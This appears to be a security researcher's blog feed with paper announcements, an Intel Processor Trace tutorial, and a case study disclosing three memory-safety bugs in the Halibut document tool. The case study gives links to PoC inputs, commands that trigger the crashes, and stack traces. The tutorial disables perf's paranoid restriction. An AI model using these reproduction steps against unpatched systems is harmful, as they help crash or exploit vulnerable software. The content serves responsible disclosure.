Carter Yagemannhttps://carteryagemann.com/2023-07-21T09:20:00-04:00<a href="https://cse.osu.edu/people/yagemann.1">Assistant Professor of Computer Science and Engineering at the Ohio State University with interests in automated vulnerability discovery, root cause analysis, and exploit prevention.</a>CheatFighter to Appear in RAID'232023-07-21T09:20:00-04:002023-07-21T09:20:00-04:00Carter Yagemanntag:carteryagemann.com,2023-07-21:/raid-23-cheatfighter.html<p>My coauthors and I will be presenting the paper "Extracting Threat Intelligence From Cheat
Binaries For Anti-Cheating" at <a href="https://raid2023.org/">RAID 2023</a> in October. Below is a preview
of the abstract:</p>
<blockquote>
<p>Rampant cheating remains a serious concern for game developers who fear losing loyal customers
and revenue. While numerous anti-cheating techniques have …</p></blockquote><p>My coauthors and I will be presenting the paper "Extracting Threat Intelligence From Cheat
Binaries For Anti-Cheating" at <a href="https://raid2023.org/">RAID 2023</a> in October. Below is a preview
of the abstract:</p>
<blockquote>
<p>Rampant cheating remains a serious concern for game developers who fear losing loyal customers
and revenue. While numerous anti-cheating techniques have been proposed, cheating persists in
a vibrant (and profitable) illicit market. Inspired by novel insights into the economics
behind cheat development and recent techniques for defending against advanced persistent
threats (APTs), we propose a fully automated methodology for extracting "cheat intelligence"
from widely distributed cheat binaries to produce a "memory access graph" that guides
selective data randomization to yield immune game clients. We have implemented a prototype
system for Android and Windows games, CheatFighter, and evaluated it on 86 cheats collected
from a variety of real-world sources, including Telegram channels and online forums.
CheatFighter successfully counteracts 80 of the real-world cheats in under a minute,
demonstrating practical end-to-end protection against widespread cheating.</p>
</blockquote>A Practical Beginner's Guide to Intel Processor Trace2023-02-24T07:00:00-05:002023-02-24T07:00:00-05:00Carter Yagemanntag:carteryagemann.com,2023-02-24:/a-practical-beginners-guide-to-intel-processor-trace.html<p>Greetings, if you're reading this tutorial, chances are you have some interest
in Intel Processor Trace (PT) and how it can improve your debugging or program
analysis capabilities, but aren't sure how to get started. This is
understandable, given that there aren't many practical tutorials on Intel PT and
what …</p><p>Greetings, if you're reading this tutorial, chances are you have some interest
in Intel Processor Trace (PT) and how it can improve your debugging or program
analysis capabilities, but aren't sure how to get started. This is
understandable, given that there aren't many practical tutorials on Intel PT and
what documentation is publicly available is scattered across Intel specifications,
Linux documentation, and nuggets of text in various smaller projects. The
existing text targets a vast range of audiences, ranging
from low-level driver
developers to experienced
software engineers. Most, if not all, of that text is not newcomer
friendly and it's easy to spend hours sifting through it only to find your basic
questions unanswered.</p>
<p>With this in mind, I've written this tutorial to fulfill two goals. The first is
to get newcomers up and running with Intel PT in as few steps as possible.
This is a hands-on tutorial for people who want to quickly get hacking. In
the process, I hope to also reveal to you what makes Intel PT so powerful and
why
it's my go to technology for any project involving dynamic program analysis. My
second goal is to then point you to the various sources of more technical
information with prefaces of what you'll find in each destination, so you can
focus your exploration based on your ultimate needs and higher goals.</p>
<p>So with all that clarified, let's dive in.</p>
<h2>Background: What is Intel PT?</h2>
<p>If you stumbled upon this tutorial by chance and have no clue what Intel PT is,
let's start with some background information and a bit of history. Readers who
already know about Intel PT or don't care for a history lesson should skip to
the next section.</p>
<p>Intel PT is one of a long line of hardware features developed and released by
Intel to help developers gain better insights into how their software runs on
Intel processors for debugging and performance profiling. If you're using an
Intel processor built within the past decade, chances are it includes Intel PT.</p>
<p>Intel PT is a spiritual successor to technologies like hardware performance
counters. Performance counters are an excellent solution if you want to know
statistical information about the performance behaviors of a particular piece of
code, like how often it encounters cache misses, but performance counters can't
tell you much at a per-instruction granularity.</p>
<p>Intel PT aims to address this
shortcoming by providing <em>execution traces</em> as opposed to just a set of counter
registers. Each trace is a stream of packets representing different events, such
as whether a branch was taken, how many processor cycles have elapsed, and so
forth. These packets are flushed directly into physical memory, asynchronously,
bypassing all caches, to enable recording of traces with minimal impact to the
target program.</p>
<p>The original intended purpose of Intel PT was to enable advanced debugging and
profiling of performance sensitive code. Intel PT yields precise information
about executed instruction sequences, timing, and even energy consumption, to
accurately record
software behaviors without the overhead or artifacts that instrumentation code
would introduce, such as cache interference. However, while Intel PT was
originally intended for debugging and profiling, it is also an extremely
powerful tool for guiding program analysis, which is why I use it extensively in
my security research projects. Unlike any other technique currently available,
Intel PT enables me to transparently observe feasible paths and timing
information for real-world executions with only about a 2% performance impact to
the target program. It can also successful yield traces in many tricky programs
that break instrumentation tools like Intel PIN or DynamoRIO. This makes it my
go to technology for collecting data to fuel my security solutions.</p>
<h2>Getting Started: Linux Perf</h2>
<p>The fastest way to start using Intel PT is to setup a Linux computer with an
Intel CPU and install Perf. <strong>Note that at the time of writing, Intel PT does
not play nicely with virtual machines or containers, so you'll need a computer
that runs Linux as its native operating system.</strong> I'm going to walk through the
steps using a Debian system, but the same steps should work for Ubuntu or (with
a bit of tweaking) any other Linux system.</p>
<p><strong>Step 1: Install Perf.</strong>
Most Linux distributions include Perf as a package
that can be installed via the default package manager. For Debian, you can
install it by opening a terminal and running:</p>
<div class="highlight"><pre><span></span><code>sudo apt install linux-perf
</code></pre></div>
<p>Be aware that since this package installs an additional kernel driver with some
beefy startup behaviors, you may need to reboot your system at this point before
proceeding.</p>
<p><strong>Step 2: Verify Intel PT is available.</strong>
Once Perf is installed, we should verify that it can access Intel PT. We can
check this with the <code>perf list</code> command:</p>
<div class="highlight"><pre><span></span><code>$ perf list | grep intel_pt
intel_pt// [Kernel PMU event]
</code></pre></div>
<p>If the above command prints no lines, then it means either your CPU doesn't have
Intel PT or it provides a very old version that lacks all the features required
to work with Perf.</p>
<p><strong>Step 3: Adjust paranoid mode.</strong>
By default, Perf only allows <code>root</code> to use Intel PT because it reveals a lot of
information about traced programs. If you want to allow any user to access Intel
PT, you can temporarily disable this restriction by running the command:</p>
<div class="highlight"><pre><span></span><code>echo -1 | sudo tee /proc/sys/kernel/perf_event_paranoid
</code></pre></div>
<p>If you want to permanently disable it, you can add the following line to
<code>/etc/sysctl.conf</code>:</p>
<div class="highlight"><pre><span></span><code>kernel.perf_event_paranoid=-1
</code></pre></div>
<p>If you decide to leave this setting at its default level, be aware that
you'll need to run the subsequent commands in this tutorial as <code>root</code>
(or use <code>sudo</code>).</p>
<p><strong>Step 4: Recording traces.</strong>
We can record traces using the <code>perf record</code> command. For this tutorial, I'll
use <code>/bin/ls</code> as my target program. Let's start with the most basic tracing:</p>
<div class="highlight"><pre><span></span><code>$ perf record -e intel_pt//u -- /bin/ls
perf.data
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.043 MB perf.data ]
</code></pre></div>
<p>In this example, <code>perf record</code> is how I tell Perf I want to record something,
<code>-e intel_pt</code> specifies that I want to record an Intel PT trace, <code>//u</code> specifies
that I want to record only the user space portion of the program's execution
(Intel PT can also record kernel execution) using the default Intel PT settings
(more on this later) and then everything after the <code>--</code> is the command that'll
be executed and traced.</p>
<p>You'll notice that Perf prints some extra messages after
the program finishes executing with useful information like how big the final
trace is. <strong>Be aware that it is possible for a program to generate too much
data for Intel PT and Perf to flush to storage in time, in which case the trace
will contain holes. Perf's messages will warn you if this occurs.</strong></p>
<p>If everything ran successfully, you should now have a <code>perf.data</code> file in your
current working directory. This file contains the Intel PT trace along with some
<em>sideband</em> data recorded by Perf's driver. This sideband records things like
where objects were mapped into memory and when context switches between tasks
occurred, which is needed in order to recover the executed instruction sequence
and untangle threads if your target program runs on multiple CPU cores
simultaneously.</p>
<p><strong>Step 5: Decoding and recovery.</strong>
In Intel PT terminology, we first have to <em>decode</em> the <code>perf.data</code> file to
extract the trace of Intel PT events, and then combine that with the recorded
sideband to <em>recover</em> the instruction execution sequence. Fortunately, Perf
comes with scripts that can do this all for us in one step.</p>
<p>The simplest (and in my opinion, most useful) command is the following:</p>
<div class="highlight"><pre><span></span><code>perf script --insn-trace
</code></pre></div>
<p>Note that by default, <code>perf script</code> tries to read <code>./perf.data</code>. If your Perf
output file is in another location or has a different name, you can specify its
path using the <code>-i</code> flag.</p>
<p>This script recovers and prints the exact sequence of instructions our target
program executed. Specifically, each line has the following format:</p>
<div class="highlight"><pre><span></span><code> ls 832828 [027] 8105202.171292271: 7fa2165d4c22 do_system+0x372 (/usr/lib/x86_64-linux-gnu/libc-2.31.so) insn: 31 c0
^Executable^ ^Task ID^ ^CPU Core #^ ^Estimated Timestamp^ ^Virtual Address^ ^Symbol Offset^ ^Object^ ^Instruction Bytes^
</code></pre></div>
<p>With this information, we now know the exact order instructions were executed,
where those instructions resided in memory, how to map those instruction back to
the original program and library files, and more. We can then use this
information to, for example, build control flow graphs and other representations
for program analysis.</p>
<p>If this is too granular for your desired use case, there's also other scripts
that can process the trace into more coarse representations. For example,
<code>--call-trace</code> will print only the function calls (along with their call depth),
which you can use to extract a call graph for the execution. You can access the
full manual for <code>perf script</code> by running <code>man perf-script</code>.</p>
<h2>Additional Noteworthy Tricks</h2>
<p><strong>Disassembling instructions.</strong>
You may have noticed that our instruction trace prints the raw bytes of the
instructions instead of printing them in nice human-readable assembly. This is
because in order to disassemble them, Perf needs access to a disassembler.
Specifically, Perf integrates with Xed, which is Intel's official disassembler.</p>
<p>Unfortunately, the default APT repositories for Debian don't include a Xed
package, so we'll need to compile and install Xed manually. Here's one way
I've found to do this:</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/intelxed/xed.git xed
git clone https://github.com/intelxed/mbuild.git mbuild
cd xed
./mfile.py examples
sudo cp ./obj/wkit/bin/xed /usr/local/bin/xed
</code></pre></div>
<p>Now that we've installed Xen, we can use the <code>--xed</code> flag with <code>perf script</code>:</p>
<div class="highlight"><pre><span></span><code>perf script --insn-trace --xed
</code></pre></div>
<p>And now the instruction bytes are replaced with human-readable assembly.</p>
<p><strong>Adjusting Timestamp Accuracy.</strong>
As I pointed out in Step 5, part of the output from <code>perf script --insn-trace</code>
includes an estimated timestamp of when each instruction executed. I emphasize
the word <em>estimated</em> because the accuracy of this timestamp depends on how
frequently we configure Intel PT to record timing packets.</p>
<p>To keep this tutorial concise, I won't go into the details of what the different
timing packets are and their trade-offs, but I'll show you how to adjust them as
an example of how to change Intel PT settings in <code>perf record</code>. We can specify
any non-default Intel PT settings like so:</p>
<div class="highlight"><pre><span></span><code>$ perf record -e intel_pt/cyc=1,cyc_thresh=0/u -- /bin/ls
perf.data
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.074 MB perf.data ]
</code></pre></div>
<p>In this case, what I've added is <code>cyc=1</code>, which enables the generation of CYC
timing packets by Intel PT and <code>cyc_thresh=0</code>, which tells Intel PT to output
these packets as frequently as possible. If you look very closely, you'll notice
the trace size has almost doubled as a result, so be mindful of this when
deciding how accurate you need the timestamps to be.</p>
<p>If we now rerun <code>perf script --insn-trace</code>, we'll see that the estimated
timestamp updates more frequently, however it still isn't updated after every
instruction. This is due to a limitation of Intel PT, but the specifics are
outside the scope of this tutorial.</p>
<p>One final useful bit of information I'll point out regarding timing is if we add
<code>-F+ipc</code> to our <code>perf script</code> command, it'll periodically print out fields like
<code>IPC: 4.14 (29/7)</code>. IPC stands for <em>instructions per cycle</em>, and in this
example, it's saying that the previous 29 instructions executed in 7 clock
cycles. This gives us a bit more insight into how the timestamps are changing.</p>
<h2>Further Reading</h2>
<p>This concludes the basics of how to use Intel PT via Perf. From here, there's
several documents you can read to gain more technical information:</p>
<p>If you want to know more about the Intel PT specification, including how to
program Intel PT with a driver, what all the packets do, and how to perform
instruction recovery, check out the
<a href="https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html">Intel Architectures Software Developer's Manuals</a>
(ASDM). The chapters get shifted around as the manual is updated, but at the
time of writing the chapter on Intel PT is located in Volume 3, Chapter 33.</p>
<p>If for some reason you do not want to rely on Perf to decode traces or you want
to integrate decoding and recovery directly into your own program,
<a href="https://github.com/intel/libipt">libipt</a> is a good starting point that offers
standalone tools and a library for processing Intel PT data.</p>
<p>If you would like to learn more about Perf's Intel PT features, including all
the other available command line arguments and other use cases like tracing
kernel executions or KVM, see Linux's
<a href="https://github.com/torvalds/linux/blob/master/tools/perf/Documentation/perf-intel-pt.txt">documentation</a>.</p>VulChecker Accepted to USENIX 20232022-09-23T10:35:00-04:002022-09-23T10:35:00-04:00Carter Yagemanntag:carteryagemann.com,2022-09-23:/usenix-23-vulchecker.html<p>My coauthors and I will be presenting our work on detecting bugs in source code
using machine learning at
<a href="https://www.usenix.org/conference/usenixsecurity23">USENIX Security 2023</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>In software development, it is critical to detect vulnerabilities in a project
as early as possible. Although, deep learning has shown …</p></blockquote><p>My coauthors and I will be presenting our work on detecting bugs in source code
using machine learning at
<a href="https://www.usenix.org/conference/usenixsecurity23">USENIX Security 2023</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>In software development, it is critical to detect vulnerabilities in a project
as early as possible. Although, deep learning has shown promise in this task,
current state-of-the-art methods cannot classify and identify the line on
which the vulnerability occurs. Instead, the developer is tasked with
searching for an arbitrary bug in an entire function or even larger region of
code.</p>
<p>In this paper, we propose VulChecker: a tool that can precisely locate
vulnerabilities in source code (down to the exact instruction) as well as
classify their type (CWE). To accomplish this, we propose a new program
representation, program slicing strategy, and the use of a message-passing
graph neural network to utilize all of code's semantics and improve the reach
between a vulnerability's root cause and manifestation points.</p>
<p>We also propose a novel data augmentation strategy for cheaply creating strong
datasets for vulnerability detection in the wild, using free synthetic samples
available online. With this training strategy, VulChecker was able to identify
24 CVEs (10 from 2019 & 2020) in 19 projects taken from the wild, with nearly
zero false positives compared to a commercial tool that could only detect 4.
VulChecker also discovered an exploitable zero-day vulnerability, which has
been reported to developers for responsible disclosure.</p>
</blockquote>PUMM Accepted to USENIX 20232022-09-02T20:00:00-04:002022-09-02T20:00:00-04:00Carter Yagemanntag:carteryagemann.com,2022-09-02:/usenix-23-pumm.html<p>My coauthors and I will be presenting our work on preventing use-after-free and
double free vulnerabilities at
<a href="https://www.usenix.org/conference/usenixsecurity23">USENIX Security 2023</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>Critical software is written in memory unsafe languages that
are vulnerable to use-after-free and double free bugs. This has
led to proposals to …</p></blockquote><p>My coauthors and I will be presenting our work on preventing use-after-free and
double free vulnerabilities at
<a href="https://www.usenix.org/conference/usenixsecurity23">USENIX Security 2023</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>Critical software is written in memory unsafe languages that
are vulnerable to use-after-free and double free bugs. This has
led to proposals to secure memory allocators by strategically
deferring memory reallocations long enough to make such
bugs unexploitable. Unfortunately, existing solutions suffer
from high runtime and memory overheads. Seeking a better
solution, we propose to profile programs to identify units
of code that correspond to the handling of individual tasks.
With the intuition that little to no data should flow between
separate tasks at runtime, reallocation of memory freed by the
currently executing unit is deferred until after its completion;
just long enough to prevent use-after-free exploitation.
To demonstrate the efficacy of our design, we implement
a prototype for Linux, PUMM, which consists of an offline
profiler and an online enforcer that transparently wraps standard
libraries to protect C/C++ binaries. In our evaluation
of 40 real-world and 3,000 synthetic vulnerabilities across
26 programs, including complex multi-threaded cases like
the Chakra JavaScript engine, PUMM successfully thwarts
all real-world exploits, and only allows 4 synthetic exploits,
while reducing memory overhead by 52.0% over prior work
and incurring an average runtime overhead of 2.04%.</p>
</blockquote>Differentiating ARCUS (USENIX'21) and Bunkerbuster (CCS'21)2022-08-31T13:00:00-04:002022-08-31T13:00:00-04:00Carter Yagemanntag:carteryagemann.com,2022-08-31:/arcus-vs-bunkerbuster.html<p>I've received several questions recently about two papers I published in 2021,
one at USENIX (which I'll refer to here as ARCUS) and another at CCS (which I'll
refer to as Bunkerbuster). You can find these papers at the
<a href="https://www.usenix.org/system/files/sec21-yagemann.pdf">USENIX</a> and
<a href="https://dl.acm.org/doi/pdf/10.1145/3460120.3485363">CCS</a> conference websites,
respectively.</p>
<p>The question people have is …</p><p>I've received several questions recently about two papers I published in 2021,
one at USENIX (which I'll refer to here as ARCUS) and another at CCS (which I'll
refer to as Bunkerbuster). You can find these papers at the
<a href="https://www.usenix.org/system/files/sec21-yagemann.pdf">USENIX</a> and
<a href="https://dl.acm.org/doi/pdf/10.1145/3460120.3485363">CCS</a> conference websites,
respectively.</p>
<p>The question people have is what makes these two publications unique from
each other? In short, how do I justify ARCUS and Bunkerbuster being two separate
publications? This question is motivated by both papers being published in the
same year, with aesthetically similar architecture diagrams, and my decision to
ultimately merge the codebases together into a
<a href="https://github.com/carter-yagemann/ARCUS">single repository</a>. Did I pull the
wool over the eyes of the reviewers (and my dissertation defense committee)?
Were my advisors asleep at the wheel? These are legitimate questions
to ask, so let me address them here.</p>
<p>For busy readers who want to get straight down to the technical brass tacks,
here is the
<a href="https://github.com/carter-yagemann/ARCUS/commit/070d0588062c6de4f087964f7c00ff280484a727">commit</a>
where ARCUS and Bunkerbuster were merged so the research community can
interrogate the roughly <em>5,600 additions</em> that Bunkerbuster contributed to
the prior ARCUS codebase. To summarize the difference in 1 sentence: ARCUS (the
first prototype) is a <em>reactive</em> system that requires traces containing exploits to
be cherry-picked by preexisting defenses, whereas Bunkerbuster (the second
prototype) is a <em>proactive</em> bug hunting system that can sift through
<em>10 times more</em> data, that <em>does not</em> contain exploits, to find and help fix
bugs, hopefully before attackers can find and exploit them in-the-wild.</p>
<p>For those who wish to read on, I'll breakdown my high-level explanation into
3 sections: the story of how ARCUS was created, how the findings and unsolved
problems in ARCUS then inspired the creation of Bunkerbuster, and the timeline
and hidden logistics surrounding their publications.</p>
<h2>ARCUS' Story</h2>
<p>At its essence, ARCUS (the earlier of the two prototypes) tackles a simpler
problem than Bunkerbuster. Specifically, in the ARCUS work, my collaborators and
I wrestle with how to diagnose alerts generated by host-based defenses like
intrusion detection systems or control flow integrity monitors. ARCUS is a
purely <em>reactive</em> system that relies on other defenses to accurately feed it
execution traces (captured using Intel Processor Trace) that contain low-level
binary exploits. In short, ARCUS has no exploration capabilities and its
performance is directly dependent on the false negative rate of whichever
preexisting defenses ARCUS is integrated with. If an exploit goes undetected,
ARCUS offers no assistance.</p>
<p>This is a strong prerequisite, but it was necessary in order to simplify the
research problem enough to focus on the core technical contribution of inventing
and demonstrating binary symbolic root cause analysis. To be clear, no research
occurs in a vacuum. The idea of binary symbolic analysis builds on a wealth of
prior knowledge, such as the
<a href="https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=6234425">Mayhem</a> work
published in 2012. However, accurately following real-world Intel PT
recordings symbolically, defining and implementing reliable detection
techniques for multiple classes of memory safety bug (buffer/integer overflow,
use-after-free, double free, format string), and then figuring out how to
leverage the recovered constraints to classify the root cause and propose a
preliminary patch, convinced my peers and reviewers that ARCUS was a
publication-worthy work, despite its narrow scope.</p>
<p>One other curious finding came out of the ARCUS work: it discovered
<em>4 new vulnerabilities</em> during the evaluation, even though it was analyzing
traces containing <em>known exploits</em>. This caught us by surprise and became the
kindling for a follow-up work: Bunkerbuster.</p>
<h2>Bunkerbuster's Story</h2>
<p>The goal of Bunkerbuster was to address all the shortcomings left behind by
ARCUS. Gone is the prerequisite of there being preexisting defenses on the
monitored system. In fact, we even removed the assumption that only 1 system is
being monitored. Instead, we aimed to make Bunkerbuster a <em>proactive</em>,
<em>end-to-end</em> bug hunting system, driven by <em>benign</em> recordings of production and
end-user workloads to find and fix bugs before an attacker could even attempt
exploitation in-the-wild. ARCUS was handed the needle (exploit) by a
<em>deus ex machina</em> (preexisting defenses). Bunkerbuster would have to search
the haystack.</p>
<p>Flowery analogies aside, what does that <em>really</em> mean at a technical level?
First, in Bunkerbuster, we could no longer tiptoe around exploration. Unless
Bunkerbuster could branch out into states not reached by the input traces, the
chances of finding bugs from recordings of benign executions would be
significantly reduced. To accomplish this, we
created a new plugin class for guiding state exploration (while controlling
state explosion) and designed and implemented search heuristics based
on our domain expertise of memory safety bugs.</p>
<p>Second, Bunkerbuster had to sift through significantly more Intel
PT data than ARCUS ever did because it was looking at benign executions rather
than malicious ones cherry-picked by a host-based defense. In empirical terms,
the dataset Bunkerbuster was evaluated on is <em>10 times larger</em> than the ARCUS
dataset, creating a noisy digital haystack. Bunkerbuster overcomes this
challenge that would cripple ARCUS using an on-the-fly hashing and snapshotting
technique that we describe in the CCS paper.</p>
<h2>Timeline and Publication Logistics</h2>
<p>The time to develop ARCUS (minus evaluation and paper writing) was about 1.5
years. Developing Bunkerbuster took an additional 1 year. So why did the papers
appear to be published so close together? The answer is conference review
cycles.</p>
<p>ARCUS was originally submitted to USENIX <em>2020</em>, and then was resubmitted to
USENIX <em>2021</em> as a major revision. This significantly inflated the time to
publication, even after all the technical work on ARCUS was completed.</p>
<p>Conversely, because my collaborators and I had already gone through the
hardships of publishing ARCUS, when we wrote the Bunkerbuster paper, we were
able to avoid many similar pitfalls and address likely reviewer critiques
upfront. The result was Bunkerbuster was accepted to CCS 2021 without major
revision, which significantly reduced its time to publication compared to ARCUS. </p>
<p>In other words, when I gave my talk at USENIX 2021 on ARCUS, I was describing a
system that had been finished over 1 year prior. For what it's worth, I'm
currently involved in 2 papers that were submitted to USENIX <em>2022</em>, but
ended up in major revisions that were resubmitted to USENIX <em>2023</em>. Should the
reviewers accept these revisions, by the time my collaborators and I give our
conference talks, we will
be describing systems we built when I was still a PhD student, except I will now
be <em>1 full year into my assistant professorship</em> at The Ohio State University. I
point this out not to raise a fuss
about USENIX's review process, but just to emphasize that ARCUS' slow
publication timeline is not a one-time anomaly. It's just the reality of
large-scale peer review.</p>
<h2>Conclusion</h2>
<p>Hopefully this clarifies the question surrounding the publication of ARCUS and
Bunkerbuster in 2021. I'm happy to answer additional questions that the
community may have, and lastly I'd like to thank the readers who made it to the
end of this text.</p>
<p>Happy hacking!</p>Update Regarding Halibut Bugs (CVE-2021-42612, CVE-2021-42613, CVE-2021-42614)2022-06-03T11:45:00-04:002022-06-03T11:45:00-04:00Carter Yagemanntag:carteryagemann.com,2022-06-03:/halibut-cves.html<p>The bugs that I found using <a href="https://github.com/carter-yagemann/arcus">ARCUS</a> in
Halibut last year have been issued 3 CVE IDs:</p>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42612">CVE-2021-42612</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42613">CVE-2021-42613</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42614">CVE-2021-42614</a></li>
</ul>
<p>To the best of my knowledge, these bugs are now fixed in the latest release
version, which at the time of writing is 1.3. Please refer to Halibut's
<a href="https://www.chiark.greenend.org.uk/~sgtatham/halibut/">project …</a></p><p>The bugs that I found using <a href="https://github.com/carter-yagemann/arcus">ARCUS</a> in
Halibut last year have been issued 3 CVE IDs:</p>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42612">CVE-2021-42612</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42613">CVE-2021-42613</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42614">CVE-2021-42614</a></li>
</ul>
<p>To the best of my knowledge, these bugs are now fixed in the latest release
version, which at the time of writing is 1.3. Please refer to Halibut's
<a href="https://www.chiark.greenend.org.uk/~sgtatham/halibut/">project website</a>
for more details.</p>Faculty Position at The Ohio State University2022-03-13T10:40:00-04:002022-03-13T10:40:00-04:00Carter Yagemanntag:carteryagemann.com,2022-03-13:/osu-hire.html<p>I have accepted an offer to become an Assistant Professor at The Ohio State
University, starting in the Fall 2022 semester.</p>
<p><strong>I am currently looking to hire 1 Ph.D. student as a full-time graduate
research assistant (GRA).</strong> If you are an incoming student and you're interested
in cutting edge …</p><p>I have accepted an offer to become an Assistant Professor at The Ohio State
University, starting in the Fall 2022 semester.</p>
<p><strong>I am currently looking to hire 1 Ph.D. student as a full-time graduate
research assistant (GRA).</strong> If you are an incoming student and you're interested
in cutting edge techniques for automatically finding and fixing severe software
<a href="https://github.com/carter-yagemann/arcus#analyzing-root-cause-using-symbex-arcus">vulnerabilities</a>,
let's have a chat. You can find my email address in
<a href="https://dl.acm.org/doi/pdf/10.1145/3427228.3427241">this publication</a>.</p>Case Study: Security Analysis of Halibut2021-10-12T17:30:00-04:002021-10-12T17:30:00-04:00Carter Yagemanntag:carteryagemann.com,2021-10-12:/halibut-case-study.html<p>Over the past year I've been studying memory corruption vulnerabilities in Linux
C/C++ programs, culminating in the open sourcing of a framework called
<a href="https://github.com/carter-yagemann/arcus">ARCUS</a> to find and explain them
automatically using a combination of dynamic tracing and symbolic analysis. My
work has led to two academic conference publications, one …</p><p>Over the past year I've been studying memory corruption vulnerabilities in Linux
C/C++ programs, culminating in the open sourcing of a framework called
<a href="https://github.com/carter-yagemann/arcus">ARCUS</a> to find and explain them
automatically using a combination of dynamic tracing and symbolic analysis. My
work has led to two academic conference publications, one that appeared in this
year's
<a href="https://www.usenix.org/conference/usenixsecurity21/presentation/yagemann">USENIX Security Symposium</a>
and another that will appear next month at <a href="https://sigsac.org/ccs/CCS2021/accepted-papers.html">ACM CCS</a>.</p>
<p>Since then, I've been going through the
<a href="https://popcon.debian.org/">Debian Popularity Contest</a> and analyzing
packages, leading to the discovery of vulnerabilities like
<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42006">CVE-2021-42006</a>.
In this post, I'd like to share <strong>3</strong> new vulnerabilities I've discovered in a
program called <a href="https://www.chiark.greenend.org.uk/~sgtatham/halibut/">Halibut</a>,
which is a <em>document preparation system</em> that currently sits at Rank 54,752 (by
number of installs) out of 182,832 packages in the popularity contest.</p>
<h2>Environment</h2>
<p>I'm using the latest official release of Halibut, version 1.2, which is
available on <a href="https://packages.debian.org/bullseye/halibut">Debian Bullseye</a>
and <a href="https://packages.ubuntu.com/hirsute/halibut">Ubuntu Hirsute</a>, to name a
few Linux distributions. The target architecture is x86-64.</p>
<p><a name="poc-halibut-winhelp-df"></a></p>
<h2>Double Free in <code>cleanup_index()</code> in <code>index.c</code></h2>
<p><strong>Steps to Reproduce:</strong></p>
<ol>
<li>Download the <a href="https://carteryagemann.com/docs/poc-halibut-winhelp-df">PoC</a>.</li>
<li>Run: <code>halibut --winhelp poc-halibut-winhelp-df</code></li>
</ol>
<p><strong>Stack Trace:</strong></p>
<div class="highlight"><pre><span></span><code>#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7e1c537 in __GI_abort () at abort.c:79
#2 0x00007ffff7e75768 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f83e2d "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7e7ca5a in malloc_printerr (str=str@entry=0x7ffff7f861c8 "double free or corruption (fasttop)") at malloc.c:5347
#4 0x00007ffff7e7dd55 in _int_free (av=0x7ffff7fb5b80 <main_arena>, p=0x5555556a5500, have_lock=0) at malloc.c:4266
#5 0x00005555555784c5 in sfree (p=0x5555556a5510) at ../malloc.c:63
#6 0x000055555557867d in free_word_list (w=0x5555556ab7b0) at ../malloc.c:130
#7 0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#8 0x0000555555578154 in main (argc=0, argv=0x7fffffffe468) at ../main.c:404
</code></pre></div>
<p><a name="poc-halibut-text-uaf"></a></p>
<h2>Use-After-Free in <code>cleanup_index()</code> in <code>index.c</code></h2>
<p><strong>Steps to Reproduce:</strong></p>
<ol>
<li>Download the <a href="https://carteryagemann.com/docs/poc-halibut-text-uaf">PoC</a>.</li>
<li>Run: <code>halibut --text poc-halibut-text-uaf</code></li>
</ol>
<p><strong>Stack Trace:</strong></p>
<div class="highlight"><pre><span></span><code>#0 __GI___libc_free (mem=0x100000001) at malloc.c:3102
#1 0x00005555555784c5 in sfree (p=0x100000001) at ../malloc.c:63
#2 0x000055555557867d in free_word_list (w=0x7000700070007) at ../malloc.c:130
#3 0x000055555557869a in free_word_list (w=0x5555556f1900) at ../malloc.c:132
#4 0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#5 0x0000555555578154 in main (argc=0, argv=0x7fffffffe478) at ../main.c:404
</code></pre></div>
<p><strong>Note:</strong> This is not the same vulnerability as the one above. Notice the
recursion inside <code>free_word_list</code> and how the PoC triggers a segmentation fault
rather than a double free abort.</p>
<p><a name="poc-halibut-info-uaf"></a></p>
<h2>Use-After-Free in <code>info_width_internal()</code> in <code>bk_info.c</code></h2>
<p><strong>Steps to Reproduce:</strong></p>
<ol>
<li>Download the <a href="https://carteryagemann.com/docs/poc-halibut-info-uaf">PoC</a>.</li>
<li>Run: <code>halibut --info poc-halibut-info-uaf</code></li>
</ol>
<p><strong>Stack Trace:</strong></p>
<div class="highlight"><pre><span></span><code>#0 info_width_internal (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:974
#1 0x000055555559c419 in info_width_internal_list (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:953
#2 0x000055555559c669 in info_width_internal (words=0x5555556ed5b0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:1009
#3 0x000055555559c776 in info_width_xrefs (ctx=0x7fffffffdf80, words=0x5555556ed5b0) at ../bk_info.c:1041
#4 0x000055555557b0cb in wrap_para (text=0x5555556ed5b0, width=66, subsequentwidth=66, widthfn=0x55555559c751 <info_width_xrefs>, ctx=0x7fffffffdf80, natural_space=0) at ../misc.c:328
#5 0x000055555559cab8 in info_para (text=0x5555556e8440, prefix=0x5555556a2d30, prefixextra=0x5555555c859c L".", input=0x5555556bcf80, keywords=0x5555556e1cd0, indent=1, extraindent=3, width=66,
cfg=0x7fffffffdf80) at ../bk_info.c:1120
#6 0x000055555559b38a in info_backend (sourceform=0x5555556a7dd0, keywords=0x5555556e1cd0, idx=0x5555556a2390, unused=0x0) at ../bk_info.c:579
#7 0x0000555555578119 in main (argc=0, argv=0x7fffffffe478) at ../main.c:398
</code></pre></div>
